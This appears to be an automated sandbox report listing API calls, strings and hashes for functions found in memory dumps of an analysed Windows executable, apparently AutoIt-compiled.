                                              • Instruction ID: 5c14e49679abe86b63a17bc4072ccd4ecc3705f4abefb4c2cba13961c26246f0
                                              • Opcode Fuzzy Hash: 8041893aa20d719217cf31e2a1087b83b88535ff46e7c2fd249c2424a72d067b
                                              • Instruction Fuzzy Hash: 9121C371A102489BCF01AF94D845BEE7BFCAF49715F00809AE858A7281DFB4598DCFA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __fread_nolock_memmove
                                              • String ID: EA06
                                              • API String ID: 1988441806-3962188686
                                              • Opcode ID: 13e6d7720c811f7fece47b6ef7f6b5805a097db4a6ccf41778ef8bad5b013571
                                              • Instruction ID: e023149b6c1b871992c1d28fb42625d6b2364027c00348aa7e5faa9fefdcb30a
                                              • Opcode Fuzzy Hash: 13e6d7720c811f7fece47b6ef7f6b5805a097db4a6ccf41778ef8bad5b013571
                                              • Instruction Fuzzy Hash: C301D6718042186EDB28DAA8C856EFE7BFCDB11301F0081AFF596D2181E9B5A6088B60
                                              APIs
                                                • Part of subcall function 00B7571C: __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                • Part of subcall function 00B7571C: __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                • Part of subcall function 00B7571C: RtlAllocateHeap.NTDLL(00F80000,00000000,00000001), ref: 00B7575F
                                              • std::exception::exception.LIBCMT ref: 00B70DEC
                                              • __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                • Part of subcall function 00B7859B: RaiseException.KERNEL32(?,?,00000000,00C09E78,?,00000001,?,?,?,00B70E06,00000000,00C09E78,00B59E8C,00000001), ref: 00B785F0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                              • String ID: bad allocation
                                              • API String ID: 3902256705-2104205924
                                              • Opcode ID: 1453dd1d4c5a069baf42df710cca0666f7c8b792bc27a3f7239b68400a121fe0
                                              • Instruction ID: c652f340c99ee507b62df535f5670b661ceab5b8fcd1b4cef33456908a211cc2
                                              • Opcode Fuzzy Hash: 1453dd1d4c5a069baf42df710cca0666f7c8b792bc27a3f7239b68400a121fe0
                                              • Instruction Fuzzy Hash: 15F06D3294031DA6DB20BBA5EC469DEB7ECDB05311F1084A6BD2C96281DBB09A9092D1
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 010086C5
                                              • ExitProcess.KERNEL32(00000000), ref: 010086E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$CreateExit
                                              • String ID: D
                                              • API String ID: 126409537-2746444292
                                              • Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                              • Instruction ID: 0a9ec670b5506a5111371725d51f3d34d8b931d5bac2a2345b94818e14243d4c
                                              • Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                              • Instruction Fuzzy Hash: 83F0EC7594024CABEB61DFE0CC49FEE77BCBF08705F008509BB5A9A180DA7496488B61
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00BB98F8
                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00BB990F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 24eb931da8f0e4fea4176a7bedb41f2939908d1011a8c1743ec626e3856a31bf
                                              • Instruction ID: 09c7898c6e479bdfb8a3b66ebc70c788bf7d60bbd3339f26271c1732c5632863
                                              • Opcode Fuzzy Hash: 24eb931da8f0e4fea4176a7bedb41f2939908d1011a8c1743ec626e3856a31bf
                                              • Instruction Fuzzy Hash: 28D05B7554530E6BDB509B90DC0DFA6B73CD704700F0042B1BA55921D1ED7095588B95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c50ccda27b2b409b8159b045ede53cc50f3dd673fe1d614405ca84f1e4970dee
                                              • Instruction ID: c97da53f7347dfe21de736acfb8a3b5947acb82f1c6a6c99d2620d7b096824ff
                                              • Opcode Fuzzy Hash: c50ccda27b2b409b8159b045ede53cc50f3dd673fe1d614405ca84f1e4970dee
                                              • Instruction Fuzzy Hash: 95F139716083059FCB14DF28C480A6ABBE5FF99314F1489AEF89A9B351D730E945CF82
                                              APIs
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B70193
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B7019B
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B701A6
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B701B1
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B701B9
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B701C1
                                                • Part of subcall function 00B660F9: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00B66154
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B5F9CD
                                              • OleInitialize.OLE32(00000000), ref: 00B5FA4A
                                              • CloseHandle.KERNEL32(00000000), ref: 00B945C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                              • String ID:
                                              • API String ID: 3094916012-0
                                              • Opcode ID: aa786e454a7c1beffbf9c654cddaea032458b37ed44d1394a542647dbbbd3749
                                              • Instruction ID: 58467768f47ddd3c81433d0aa3aeeb955ee91025df59434d8c80674cd4ff7166
                                              • Opcode Fuzzy Hash: aa786e454a7c1beffbf9c654cddaea032458b37ed44d1394a542647dbbbd3749
                                              • Instruction Fuzzy Hash: F781CCB0915A40CEC784DF29E8817DCBBE5FBDB306790C1AAA019CB3B1EB7044858F55
                                              APIs
                                              • _memset.LIBCMT ref: 00B54370
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B54415
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B54432
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$_memset
                                              • String ID:
                                              • API String ID: 1505330794-0
                                              • Opcode ID: a6cff9cbae200312e62c4832060d248716072512ab1e4a2005ea1970b993bd8f
                                              • Instruction ID: 0e6775b137a8643b284c84068eed8c9e284b7777b0bd54af16b024f9d97ba828
                                              • Opcode Fuzzy Hash: a6cff9cbae200312e62c4832060d248716072512ab1e4a2005ea1970b993bd8f
                                              • Instruction Fuzzy Hash: 45318071505701DFC721DF24D88479BBBF8FB49309F0049AEE99A87251E7B0A988CB52
                                              APIs
                                              • __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                • Part of subcall function 00B7A16B: __NMSG_WRITE.LIBCMT ref: 00B7A192
                                                • Part of subcall function 00B7A16B: __NMSG_WRITE.LIBCMT ref: 00B7A19C
                                              • __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                • Part of subcall function 00B7A1C8: GetModuleFileNameW.KERNEL32(00000000,00C133BA,00000104,00000000,00000001,00000000), ref: 00B7A25A
                                                • Part of subcall function 00B7A1C8: ___crtMessageBoxW.LIBCMT ref: 00B7A308
                                                • Part of subcall function 00B7309F: ___crtCorExitProcess.LIBCMT ref: 00B730A5
                                                • Part of subcall function 00B7309F: ExitProcess.KERNEL32 ref: 00B730AE
                                                • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                              • RtlAllocateHeap.NTDLL(00F80000,00000000,00000001), ref: 00B7575F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                              • String ID:
                                              • API String ID: 1372826849-0
                                              • Opcode ID: e14430ae9741bbb880673444767a5be10a5d71f0d089c610cb50d6f359253e39
                                              • Instruction ID: 052577923be417da4ba72afca69f90381bdf7b826858ae6ae5612e09afe001d2
                                              • Opcode Fuzzy Hash: e14430ae9741bbb880673444767a5be10a5d71f0d089c610cb50d6f359253e39
                                              • Instruction Fuzzy Hash: 7801D231244A02DAE6292738AC82B6E63C8DB82762F1080A5F43DEB281DEB09D014660
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00BB9548,?,?,?,?,?,00000004), ref: 00BB98BB
                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00BB9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00BB98D1
                                              • CloseHandle.KERNEL32(00000000,?,00BB9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BB98D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandleTime
                                              • String ID:
                                              • API String ID: 3397143404-0
                                              • Opcode ID: 251c3266143260f89d1b877c7cd246278ed76fb63c12af8ad81deef16cc49fcd
                                              • Instruction ID: dddc0433c6970e43308bbddd74fe6aafe15e5d4121c257e4ab68b03d905cf05f
                                              • Opcode Fuzzy Hash: 251c3266143260f89d1b877c7cd246278ed76fb63c12af8ad81deef16cc49fcd
                                              • Instruction Fuzzy Hash: B2E08632146225B7D7211B54EC09FEABF59EF06B70F104121FB157A0E09BB11A119798
                                              APIs
                                              • _free.LIBCMT ref: 00BB8D1B
                                                • Part of subcall function 00B72D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B79A24), ref: 00B72D69
                                                • Part of subcall function 00B72D55: GetLastError.KERNEL32(00000000,?,00B79A24), ref: 00B72D7B
                                              • _free.LIBCMT ref: 00BB8D2C
                                              • _free.LIBCMT ref: 00BB8D3E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                              • Instruction ID: 1c6bd86f07bbaf6ca1a6bc234ad92ac0c8f186dc2d95ca0260f276e2bdc3557a
                                              • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                              • Instruction Fuzzy Hash: 2DE012A160160157CB34A679A940AE313DC8F5835271449BEB41DD7186CEA4F842C124
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CALL
                                              • API String ID: 0-4196123274
                                              • Opcode ID: 0767369bc6551722374289b9c17469c8933d4520eee1796384f5a6ad11d31cc5
                                              • Instruction ID: 16cade2d6ac3dafe901ab27ca086340fb43f73bf2d7880c291604f146d08d9dc
                                              • Opcode Fuzzy Hash: 0767369bc6551722374289b9c17469c8933d4520eee1796384f5a6ad11d31cc5
                                              • Instruction Fuzzy Hash: 6B223770508201DFDB24EF14C494B6ABBE1FF89305F1589EDE89A9B261D731ED49CB82
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: EA06
                                              • API String ID: 4104443479-3962188686
                                              • Opcode ID: cb9333909c27bae07445e8891500a4bfc90a11d5c568b52ea79617b9ff919afe
                                              • Instruction ID: 9b6e0d4b73defcbf86d46f40a85c1940afea7c508adc8db1f3ba37820e96ad39
                                              • Opcode Fuzzy Hash: cb9333909c27bae07445e8891500a4bfc90a11d5c568b52ea79617b9ff919afe
                                              • Instruction Fuzzy Hash: ED415D21A0415867DF229B6488927BE7FF1DB4530AF2844F5EC869B2C2D7245DCD83A1
                                              APIs
                                              • 74A3C8D0.UXTHEME ref: 00B54834
                                                • Part of subcall function 00B7336C: __lock.LIBCMT ref: 00B73372
                                                • Part of subcall function 00B7336C: RtlDecodePointer.NTDLL(00000001), ref: 00B7337E
                                                • Part of subcall function 00B7336C: RtlEncodePointer.NTDLL(?), ref: 00B73389
                                                • Part of subcall function 00B548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B54915
                                                • Part of subcall function 00B548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B5492A
                                                • Part of subcall function 00B53B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B53B68
                                                • Part of subcall function 00B53B3A: IsDebuggerPresent.KERNEL32 ref: 00B53B7A
                                                • Part of subcall function 00B53B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C152F8,00C152E0,?,?), ref: 00B53BEB
                                                • Part of subcall function 00B53B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00B53C6F
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B54874
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                              • String ID:
                                              • API String ID: 2688871447-0
                                              • Opcode ID: 6c864644345f32ba2d2b8014b179c1015e06814c3e886bff41c0a613ca67d068
                                              • Instruction ID: 364d39d37853042a28bf1b4114ff9d195bf8b18bf0256ee60d8827e9f75c7169
                                              • Opcode Fuzzy Hash: 6c864644345f32ba2d2b8014b179c1015e06814c3e886bff41c0a613ca67d068
                                              • Instruction Fuzzy Hash: D1118C72908341DFC700DF68E845B4EBBE8FB96750F10859EF455872B1DBB09A48CB92
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00B55821,?,?,?,?), ref: 00B55CC7
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00B55821,?,?,?,?), ref: 00B8DD73
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 094284bc86861249283c325129b76087e55008498543e2d96fe07692ed1fbaba
                                              • Instruction ID: c9d4bb2983c8d3c9680a08e930b5539ab81ba0233c4e03cb5bb7e07142d95f26
                                              • Opcode Fuzzy Hash: 094284bc86861249283c325129b76087e55008498543e2d96fe07692ed1fbaba
                                              • Instruction Fuzzy Hash: B3016D70244748BEF2301E24CC9AF767BDCEB0576AF108399BAE5AA1E0C6B45C488B50
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __lock_file_memset
                                              • String ID:
                                              • API String ID: 26237723-0
